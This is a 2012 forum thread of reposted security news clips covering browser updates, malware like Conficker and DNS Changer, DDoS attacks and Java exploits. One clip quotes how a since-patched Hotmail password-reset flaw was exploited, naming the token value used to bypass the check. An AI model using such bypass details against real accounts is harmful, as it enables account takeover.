The machine holding GlobalSign's root certificate is not connected to the internet, the exec told ZDNet UK. To access the root certificate, a person must retrieve the machine from a locked box, insert a number of smart cards, and type in multiple PINs and access codes. The 'Comodohacker' accessed a webserver that was distinct from the company's mailserver, and managed to compromise the company certificate and some PDF files.

http://www.zdnet.co.uk/blogs/security-bulletin-100...


--
Was this reply relevant?
+0
-0
mogs CClip 83
Expert Contributor 25th Apr, 2012 21:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
CCleaner 3.18 Adds Support for Firefox 12 CCleaner just received an update, incrementing the build number to 3.18. The new revision keeps up with browser development by adding support for the freshly released Firefox 12 as well Google Chrome 20.

However, modifications available in CCleaner 3.18 do not resume to web browsers. It also integrates multiple selection in the detailed results view and improves support for Internet Explorer 64-bit add-ons.

Moreover, the current revision sports a better folder detection algorithm for cleaning up items as well as improved scrolling interface for include/exclude dialogs. On the same note, compatibility with Windows 7 Alt+Tab function has been revised and bettered.

Adding a new batch of applications it can clean up is also available, with Corel VideoStudio Pro X5, MS Security Client and GIMP 2.8 making the list.

http://news.softpedia.com/news/CCleaner-3-18-Adds-...

--
Was this reply relevant?
+0
-0
mogs CClip 84
Expert Contributor 25th Apr, 2012 21:42
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Tuesday, April 24, 2012 | 17:08
Labels: Dev updates
The Dev channel has been updated to 20.0.1115.1 for Windows, Mac, Linux and Chrome Frame. The build contains few fixes and update to V8 (3.10.5.0). Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 85
Expert Contributor 25th Apr, 2012 21:54
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Computerworld - Mozilla released Firefox 12, patching 14 security bugs in the browser and moving it one step closer to matching rival Chrome in silent updating.

The latest in the line of updates that have rolled off the Mozilla development line every six weeks since mid-2011, Firefox 12 fixed seven vulnerabilities labeled "critical," the highest threat ranking in Mozilla's four-step scoring, four bugs tagged "high" and three pegged "moderate."

Mozilla also patched 19 other bugs, all critical, in the mobile edition of Firefox, which runs on the Android platform.
Among the 14 desktop vulnerabilities, Mozilla patched three that could be used by hackers in cross-site scripting (XSS) attacks, one that applied only to Windows Vista and Windows 7 PCs with hardware acceleration disabled and another in image rendering done by the WebGL 3D standard.

Two of the bugs were reported by security researchers at rivals Google and Opera Software. The Google engineer also notified Mozilla of all 19 vulnerabilities in the FreeType library that affected the mobile version of the browser.

More at :-
http://www.computerworld.com/s/article/9226529/Moz...

--
Was this reply relevant?
+0
-0
mogs CClip 86
Expert Contributor 26th Apr, 2012 21:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Beta Channel Update
Wednesday, April 25, 2012 | 16:44
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.36 for Windows, Mac, Linux, and Chrome Frame.

Take a look at the changelog to see what happened in this release.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome

http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 87
Expert Contributor 26th Apr, 2012 21:22
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Most of the Internet's top 200,000 HTTPS websites are insecure
Trustworthy Internet Movement say 75 percent of HTTPS websites from Alexa's top one million are vulnerable to the BEAST SSL attack

By Lucian Constantin | IDG News Service

Ninety percent of the Internet's top 200,000 HTTPS-enabled websites are vulnerable to known types of SSL (Secure Sockets Layer) attack, according to a report released Thursday by the Trustworthy Internet Movement (TIM), a nonprofit organization dedicated to solving Internet security, privacy and reliability problems.

The report is based on data from a new TIM project called SSL Pulse, which uses automated scanning technology developed by security vendor Qualys, to analyze the strength of HTTPS implementations on websites listed in the top one million published by Web analytics firm Alexa.

[ Get your websites up to speed with HTML5 today using the techniques in InfoWorld's HTML5 Deep Dive PDF how-to report. | Learn how to secure your Web browsers in InfoWorld's "Web Browser Security Deep Dive" PDF guide. ]

SSL Pulse checks what protocols are supported by the HTTPS-enabled websites (SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, etc.), the key length used for securing communications (512 bits, 1,024 bits, 2,048 bits, etc.) and the strength of the supported ciphers (256 bits, 128 bits or lower).

An algorithm is used to interpret the scan results and assign a score between 0 and 100 to each HTTPS configuration. The score is then translated into a grade, with A being the highest (over 80 points).

Half of the almost 200,000 websites in Alexa's top one million that support HTTPS received an A for the quality of their configurations. This means that they use a combination of modern protocols, strong ciphers and long keys.

Despite this, only 10 percent of the scanned websites were deemed truly secure. Seventy-five percent -- around 148,000 -- were found to be vulnerable to an attack known as BEAST (Browser Exploit Against SSL/TLS), which can be used to decrypt authentication tokens and cookies from HTTPS requests.

Read more at :-
http://www.infoworld.com/d/security/most-of-the-in...

--
Was this reply relevant?
+0
-0
mogs CClip 88
Expert Contributor 26th Apr, 2012 21:27
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
VMware ESX source code has been stolen and posted online, but the company says its virtualization platform doesn't necessarily pose an increased risk to customers.

The stolen code amounts to a single file from sometime around 2003 or 2004, the company says in a blog post.

"The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers," according to the blog written by Iain Mulholland, director of the company's Security Response Center.

The code was stolen from a Chinese company called CEIEC (China Electronics Import & Export Corporation) during a March breach, according to a posting on the Kaspersky Threat Post blog. The code along with internal VMware emails were posted online three days ago.

VMware didn't respond immediately to a request for more information about the impact of the breach on customers.

Eric Chiu, president of virtualization security firm Hytrust, says it's hard to say what VMware customers should do because there's not enough detail about how the exposed code is being used in current products. In general, though, customers should review the security for virtual environments to address the fact that a compromised hypervisor exposes multiple virtual machines.

Read more at :-
http://www.infoworld.com/d/security/vmware-source-...

--
Was this reply relevant?
+0
-0
mogs CClip 89
Expert Contributor 26th Apr, 2012 21:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Conficker worm is still troubling Microsoft

Virus won’t go away
By Dave Neal
Thu Apr 26 2012, 09:46

SOFTWARE FLOGGER Microsoft has warned that the Conficker virus is still residing on millions of Windows machines.
In its latest Security Intelligence Report, volume 12 (PDF), the firm said that the worm had raised its head 220 million times in the last two and a half years. It said that it is one of the biggest threats to businesses and continues to be a problem because people insist on using crappy passwords.
"Conficker is one of the biggest security problems we face, yet it is well within our power to defend against," said Tim Rains, director of Microsoft Trustworthy Computing.
"It is critically important that organisations focus on the security fundamentals to help protect against the most common threats."
The phrase "weak passwords" keeps coming up in the report and there are suggestions that users are slow to patch known vulnerabilities, but Microsoft did give the malware writers some credit for the continued spread of Conficker. It said that some of its successes come from persistence and determination and the use of different attack tactics.
"Most attacks do not possess new, super-advanced techniques or technology as the APT label implies; in the majority of cases, they simply exploit weak or stolen passwords or vulnerabilities for which a security update exists and employ social engineering," said Rains.

http://www.theinquirer.net/inquirer/news/2170432/c...

--
Was this reply relevant?
+0
-0
mogs CClip 90
Expert Contributor 26th Apr, 2012 21:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
DNS Changer Virus May Attack 20,000 Devices in UK

Written by
Alex Serban
Alex holds an engineering degree in Telecommunications and has been covering technology as a writer since 2009. Customization it’s his middle...
26 April, 2012security fbi malware virus

And even more worldwide

The "DNS Changer" malware, one of the most widespread viruses at the moment, could attack more than 350,000 computers worldwide on 9th July, with a big portion of the infected being from the UK.

The FBI has stated that on the fated day, approximately a half of million devices could lose internet access, leaving them unprotected against DNS Changer, a virus developed by an Estonian organisation and which was discovered back in November last year.

Since then, it has successfully infiltrated over 500,000 desktop computers, including Mac units, by hijacking the device without user knowledge and spamming clickable adverts. Although at first this could only mean a slightly slower connection for the owner, like a malware iceberg, much more lies beneath the surface.

The virus also has the means to disable antivirus software and to redirect precious information towards a main server. The virus can even disable the user's internet connection if it finds out that the server has been shut down, as the FBI previously attempted.

So officials have chosen to temporarily replace the server with a site that checks if the computer is infected and remove the virus if found.

Unfortunately, this clever scheme costs the bureau too much, and it has taken the decision to close the website on 9th July, leaving more than 350,000 infected computers without a live connection.

Reports show that 20,000 of those affected are from UK and more than 85,000 can be found in America.

Read more: http://www.itproportal.com/2012/04/26/dns-changer-...

--
Was this reply relevant?
+0
-0
mogs CClip 91
Expert Contributor 26th Apr, 2012 21:46
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
UK2.NET smashed offline by '10-million-strong' botnet

Punters' websites go titsup after DNS servers nobbled
By Brid-Aine Parnell

Posted in Enterprise Security, 26th April 2012 10:02 GMT
British web hosting outfit UK2.NET was on the business end of a distributed denial-of-service attack last night that took down customers' websites.

The company's chief operating officer, Martin Baker, told The Register that UK2 had never seen a DDOS attack on this scale before.

"There was a botnet attack last night on our DNS servers. It was intermittent for people so they might see some sites up or down depending on when they're making the requests for pages," he explained. "We saw around 10 million apparently unique IPs attack us."

UK2 saw the peak of the attack at around midnight although customers first started seeing problems with their websites yesterday afternoon.

"We took various actions to trace this back to the IP addresses that they were attacking from so once we identified that we were able to put in mitigating activities to reduce it down and managed to get it off our network by about 3am," Baker said.

"The scale [of the attack] just took us longer than usual to mitigate," he added.

More at :-
http://www.theregister.co.uk/2012/04/26/uk2net_out...

--
Was this reply relevant?
+0
-0
mogs CClip 92
Expert Contributor 26th Apr, 2012 21:50
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Critical 0-Day in Hotmail Exploited in the Wild, Microsoft Issues Fix

Security researchers from the Vulnerability Lab identified a critical password reset and setup flaw in Microsoft’s Hotmail service. As it turns out, cybercriminals also found the same weakness and quickly saw a big profit in it, but thanks to experts from the Lab and Microsoft's Security Response Center a fix was issued to prevent abuse.

According to WhiteC0de, the flaw was also detected by a hacker from Saudi Arabia. The details of the hack got leaked on an underground forum where the hacking service was advertised for $20 (15 EUR) per hacked Hotmail/Live account.

In a matter of days, a number of Hotmail accounts were hijacked by cybercriminals, presumably from Morocco, who were in possession of the remote exploit.

Fortunately for Microsoft, experts from the Vulnerability Lab, independently found the same flaw on April 10. The Redmond company was notified on April 20 and rushed to issue a temporary fix the same day.

A patch was released a few days later, before massive damage could be done by the cybercriminals.

More at :-
http://news.softpedia.com/news/Critical-0-Day-in-H...

--
Was this reply relevant?
+0
-0
mogs CClip 93
Expert Contributor 28th Apr, 2012 11:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Ghost of HTML5 future: Web browser botnets

With great power comes great responsibility ... to not pwn the interweb
By John Leyden
B-Sides HTML5 will allow web designers to pull off tricks that were previously only possible with Adobe Flash or convoluted JavaScript. But the technology, already widely supported by web browsers, creates plenty of opportunities for causing mischief.

During a presentation at the B-Sides Conference in London on Wednesday, Robert McArdle, a senior threat researcher at Trend Micro, outlined how the revamped markup language could be used to launch browser-based botnets and other attacks. The new features in HTML5 - from WebSockets to cross-origin requests - could send tremors through the information security battleground and turn the likes of Chrome and Firefox into complete cybercrime toolkits.

Many of the attack scenarios involve using JavaScript to create memory-resident "botnets in a browser", McArdle warned, which can send spam, launch denial-of-service attacks or worse. And because an attack is browser-based, anything from a Mac OS X machine to an Android smartphone will be able to run the platform-neutral code, utterly simplifying the development of malware.

Read more at :-
http://www.theregister.co.uk/2012/04/27/html5/

--
Was this reply relevant?
+0
-0
mogs CClip 94
Expert Contributor 28th Apr, 2012 11:44
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft squashes Hotmail password hijack bug

Hackers offer to crack accounts for £12
By Anna Leach

Posted in Security, 27th April 2012 12:31 GMT
Microsoft has smacked down a Hotmail bug that allowed hackers to lock users out of their own accounts.

Redmond took one day to slap down a glitch that allowed anyone with a Firefox add-on to remotely reset the password of a Hotmail account. The Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.

When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose. Vulnerability-lab.com outlined the details:

Remote attackers can bypass the password recovery service to set up a new password and bypass in place protections (token based). The token protection only checks if a value is empty, then blocks or closes the web session. A remote attacker can, for example, bypass the token protection with values “+++)-“. Successful exploitation results in unauthorized MSN or Hotmail account access.

The bug seems to have been around for a while, but has recently been targeted by hackers on a larger scale. Blog whitec0de pointed out that hackers online were advertising to crack Hotmail accounts for as little as $20 (£12).

According to the vulnerability-lab.com report: Microsoft was alerted to the flaw on 20 April, and got a fix out on 21 April, one day later. They went public with the fix yesterday.

Hotmail has 364 million users, according to a comscore report from 2010. ®

http://www.theregister.co.uk/2012/04/27/hotmail_bu...




--
Was this reply relevant?
+0
-0
mogs CClip 95
Expert Contributor 28th Apr, 2012 11:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
27
APR 12
Correction to Java Update Story

An earlier version of this blog post incorrectly stated that Oracle had shipped security updates for its Java software. Oracle did push out an update for Java earlier this month — Java 6 Update 32 — but the new version was a maintenance update that did not include security fixes. My apologies for any confusion this may have caused.

http://krebsonsecurity.com/category/latest-warning...

--
Was this reply relevant?
+0
-0
mogs CClip 96
Expert Contributor 28th Apr, 2012 11:55
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Mozilla auto-upgrade will kill Firefox 3.6
Citing security risks, it will push 3.6 to Firefox 12 next month unless users disable updates

By Gregg Keizer | Computerworld

Mozilla will give Firefox 3.6 the coup de grace next month by automatically upgrading users of that 2010 browser to Firefox 12.

The move isn't a first for the open source developer: A year ago, it gave Firefox 3.5 the same auto-upgrade death blow.

According to Alex Keybl, Firefox's release manager, the automatic upgrade of Firefox 3.6 to Firefox 12 will take place in early May, although a date has not yet been set.

The decision to push Firefox 3.6 users to a newer edition has been under discussion for several weeks. In late March, Keybl brought it up on a Mozilla planning discussion thread, saying that the proposal was needed to keep users safe while they browsed.

Mozilla issued its final security update for Firefox 3.6 on Jan. 31, and officially retired the browser from support last Tuesday, April 24.

Mozilla has given Firefox 3.6 users plenty of warning, telling them several times over the last months that they need to upgrade because of the impending retirement. The newest such message told Firefox 3.6 users that it was their last warning before Mozilla switched on automatic upgrading.

Read more at :-
http://www.infoworld.com/d/applications/mozilla-au...

--
Was this reply relevant?
+0
-0
mogs CClip 97
Expert Contributor 28th Apr, 2012 12:01
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft Security Essentials Updated to Version 4.0

The company says the new version improves both scanning performance and malware detection rates.

By Jeff Goldman

Microsoft recently released the latest version of its free Microsoft Security Essentials (MSE) software for Windows.

"The bulk of the changes this time are under the hood," notes BetaNews' Mike Williams. "MSE’s 'Automatic Remediation' now does a better job of quarantining threats on its own, for instance, no user intervention required. And Microsoft claims scanning performance and malware detection rates have both improved on the previous build. The program can now also use the Microsoft Active Protection Service (the new name for SpyNet) to automatically report malware to Microsoft, helping the company to create new definitions and more quickly respond to new outbreaks. "

"Just a reminder about MSE’s origins: MSE was aimed first and foremost at users who either can’t or won’t pay for antivirus/anti-malware software, with the idea being that more secure Windows PCs mean less security risks for all Windows users," writes ZDNet's Mary-Jo Foley. "With MSE, there is no registration required, no trials with an expiration date or required renewals. But Microsoft does restrict the MSE download (both the beta and final) to PCs running Genuine Windows (which has been authenticated as non-pirated)."

"According to software analysis firm OPSWAT, Microsoft's Security Essentials came in at second [PDF file] for North American antivirus market share with 14.92 percent -- less than two points below the top-used antivirus software from Symantec," writes Redmondmag.com's Chris Paoli. "This last quarter saw Security Essentials overtake AVG for that second slot. However, for successful detection rates, antivirus software testing company AV-Comparatives ranked Microsoft last [PDF file] out of 15 antivirus makers for total detection rate. "

http://www.esecurityplanet.com/windows-security/mi...

--
Was this reply relevant?
+0
-0
mogs CClip 98
Expert Contributor 29th Apr, 2012 10:44
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Java-Exploiting Malware Targets Both Mac and Windows Users

SophosLabs experts have identified a new piece of malware which, similar to the infamous Flashback Trojan, leverages a vulnerability in Java to infect systems. This threat is designed to target not only Mac computers, but also ones running Windows.

The Python-based malicious element is served via hijacked websites which host exploits that check if the latest Java patch has been applied.

If the system is unpatched, a piece of code, identified by Sophos as Mal/JavaCmC-A is downloaded to the affected computer.

At this point, depending on the operating system (OS), Mal/Cleaman-B is downloaded by the Java code on Windows, and OSX/FlsplyDp-A is pushed onto devices that run Mac OS X.

Unfortunately for the victims, it doesn’t end here. Once these threats find themselves on a machine that runs a Microsoft OS, they will proceed to download a backdoor Trojan called Troj/FlsplyBD-A.

On Apple systems, a Python script, update.py (OSX/FlsplySc-A), is decrypted and starts acting as a backdoor which allows the attackers to send commands, execute arbitrary code, and steal files.

Graham Cluley advises users to run an updated antivirus solution if they sense that their devices might be infected, but Mac customers can rely on another technique to perform a check.

More at :-
http://news.softpedia.com/news/Java-Exploiting-Mal...

--
Was this reply relevant?
+0
-0
mogs CClip 99
Expert Contributor 29th Apr, 2012 10:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Firefox Aurora 14 Available for Download If you’re curious of what’s to come to Firefox, the latest Aurora lays the plans in a straightforward manner, announcing notable new features, such as setting plugins to load only on click.

Search privacy is also among the changes, as in Aurora all the default ways to search rely on Google HTTPS search service. On the same note, the site identity manager has been tweaked to prevent spoofing of an SSL connection with favicons.

Another important change in Aurora 14 touches on the address bar (dubbed “Awesome”), which can now auto-complete typed URLs, in order to shorten the time spent to reach a previously visited web location.

On Mac OS X 10.7, Firefox Aurora comes with native full-screen support for apps.

Developers have not been forgotten as pointer lock API has been implemented as well as a new API that prevents the display from sleeping.

All these changes are to be expected in the stable version on July 17, this year.

http://news.softpedia.com/news/Firefox-Aurora-14-A...

--
Was this reply relevant?
+0
-0
mogs CClip 100
Expert Contributor 30th Apr, 2012 19:17
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Down but not out: Conficker camouflages new Windows infections
Crippled botnet still dangerous, makes PCs vulnerable to follow-up malware attacks

By Gregg Keizer
April 30, 2012 06:28 AM
Computerworld - Windows PCs infected with Conficker are more likely to be compromised by other malware because the worm masks those secondary infections and makes those machines easier to exploit, a security expert said.

That's the biggest reason why Conficker, although crippled and seemingly abandoned by its makers, remains a threat and should be eradicated, said Rodney Joffe, senior technologist at Neustar and a cybersecurity adviser to the White House.

Virginia-based Neustar is an information and analytics provider, and one of the corporate members of the Conficker Working Group (CWG), which has been "sinkholing" the Conficker botnet for more than two years.

"We're pretty sure that [other malware] is using Conficker for cover," Joffe said in an interview Friday. "When we find a machine [harboring Conficker], we usually find that it's been infected by other methods as well."

More at :-
http://www.computerworld.com/s/article/9226697/Dow...

--
Was this reply relevant?
+0
-0
mogs CClip 101
Expert Contributor 30th Apr, 2012 19:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Slow uptake of Windows 8 preview hints at lack of interest
If usage share equals enthusiasm, new OS half as interesting to users as Windows 7 was in its beta stage

By Gregg Keizer
April 30, 2012 12:09 PM ET
Computerworld - Windows users appear half as interested in trying out the new Windows 8 as they did three years ago when they jumped at the chance to test drive Windows 7, data shows.

According to Web analytics company Net Applications, only 0.11% of the computers that went online last week ran Windows 8. That number -- representing 11 machines out of each 10,000 -- was the same as Windows 8 averaged in March.

And it's significantly less than Windows 7's usage share at the same point in its development history.

At the end of the first two full months after the release of Windows 7 Beta, that operating system was powering 0.26% -- or 26 out of every 10,000 -- of the PCs that browsed the Web.

More at :-
http://www.computerworld.com/s/article/9226710/Slo...

--
Was this reply relevant?
+0
-0
mogs CClip 102
Expert Contributor 30th Apr, 2012 19:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Oracle provides Java fixes directly to Mac users
Mac users get Java updates at the same time as they are available for Windows and Linux with the release of Java SE 7 Update 4

By Roman Loyola | Macworld

The recent Flashback Trojan exposed a problem that OS X has with Java -- specifically, that the development of Java on the Mac hasn't kept pace with the Java for Windows or Linux. Flashback uses an unpatched Java vulnerability to install itself on a Mac, a hole that Oracle, the developers of Java, had patched in Java for other platforms. Apple eventually fixed the Java vulnerability with a Software Update release, though you can't help but think that Flashback could have been avoided entirely with an up-to-date Java.

Hopefully, exploited Java vulnerabilities will be a thing of the past. As reported by Ars Technica, Oracle is now giving Mac users the ability to get Java updates at the same time as they are available for Windows and Linux with the release of the Java SE 7 Update 4.

According to a blog post by Oracle's Henrik Stahl, "From this point on, every release of Oracle JDK 7 and JavaFX 2.1 (and later) will be available on Mac at the same time as for Linux, Windows and Solaris."

More at :-
http://www.infoworld.com/d/security/oracle-provide...

--
Was this reply relevant?
+0
-0
mogs CClip 103
Expert Contributor 30th Apr, 2012 19:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Symantec Threat Report: Malicious Attacks Up 81 Per Cent

Read more: http://www.itproportal.com/2012/04/30/symantec-thr...
Spam levels are down, but that’s a reflection of a shift towards social engineering

Symantec has just released its latest annual Internet Security Threat Report, which recorded a substantial increase in the amount of malicious attacks.

The security firm noted that it blocked some 5.5 billion malicious attacks throughout 2011, which was up 81 per cent on the previous year. Furthermore, the number of unique malware variants increased to 403 million, and the number of web attacks blocked per day went up by a third.

On the other hand, the better news was that new vulnerabilities discovered decreased by 20 per cent, a significant drop. Although as Symantec notes, this is partially a reflection of the amount of cyber-ne'er-do-wells who are adopting easy to use attack toolkits to take efficient advantage of existing vulnerabilities.

Spam levels also fell, which ties in with the findings of Sophos in its latest "dirty dozen" spam report. This may be in part due to service providers honing anti-spam measures, but is more indicative of a refocusing of cyber-criminal efforts away from traditional spam campaigns, targeting social networks instead.

Social engineering techniques exploit the viral nature of the networks, and make for a potentially serious snowball effect which the cyber-criminals are attempting to take maximum advantage of.

Read more: http://www.itproportal.com/2012/04/30/symantec-thr...

--
Was this reply relevant?
+0
-0
mogs CClip 104
Expert Contributor 30th Apr, 2012 19:55
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 1st May, 2012 21:25
Microsoft Ends Security Essentials 4 Beta Program The final flavor of the latest version of Microsoft’s popular Security Essentials antivirus was made available for download last week.

The software was made available in a beta version in the fourth quarter of the last year, when Microsoft also launched the beta testing program for it.

The final flavor of Microsoft Security Essentials 4 was released to the public on April 25th, while the beta program ended the next day, on April 26th.

All those who beta tested the software and who have the automatic updates feature turned on on their computers will receive the new version via Windows Update.

However, they can also download and install the security product manually, as can all those who did not participate in the program.

Microsoft Security Essentials is a free security application, meant to provide users with protection against today’s threats in the malware landscape.

The software was made available with support for all computers running Windows XP Service Pack 3 (SP3), Windows Vista and Windows 7. It is compatible both with x86 and x64 computers.

In order to take advantage of Microsoft Security Essentials, users should have a genuine version of Windows installed on their computers.

Not only is it free to download and install, but MSE is also easy to use, and requires a low amount of resources to operate efficiently, which makes it a great option for users with older or less powerful machines.

“Microsoft Security Essentials is a free download from Microsoft that is simple to install, easy to use, and always kept up-to-date so you can be assured your PC is protected by the latest technology,” Microsoft explains.

“Microsoft Security Essentials runs quietly and efficiently in the background so you’re free to use your Windows-based PC the way you want—without interruptions or long computer wait times.”

The latest version of Microsoft Security Essentials is available for download from Softpedia via this link.

http://news.softpedia.com/news/Microsoft-Ends-Secu...


This thread is now closed....thankyou for your support.......Please see May's CYBERCLIPS Edition at :-
http://secunia.com/community/forum/thread/show/125...

--
Was this reply relevant?
+0
-0

This thread has been marked as locked.


 Products Solutions Customers Partner Resources Company
 
 Corporate
Vulnerability Intelligence Manager (VIM)
Corporate Software Inspector (CSI)
Consumer
Personal Software Inspector (PSI)
Online Software Inspector (OSI)
 Industry
Compliance
Technology
Integration
 Customers
Testimonials
 VARS
MSSP
Technology Partners
References
 Reports
Webinars
Events
 About us
Careers
Memberships
Newsroom


 
© 2002-2014 Secunia ApS - Rued Langgaards Vej 8, 4th floor, DK-2300 Copenhagen, Denmark - +45 7020 5144
Terms & Conditions and Copyright - Privacy - Report Vulnerability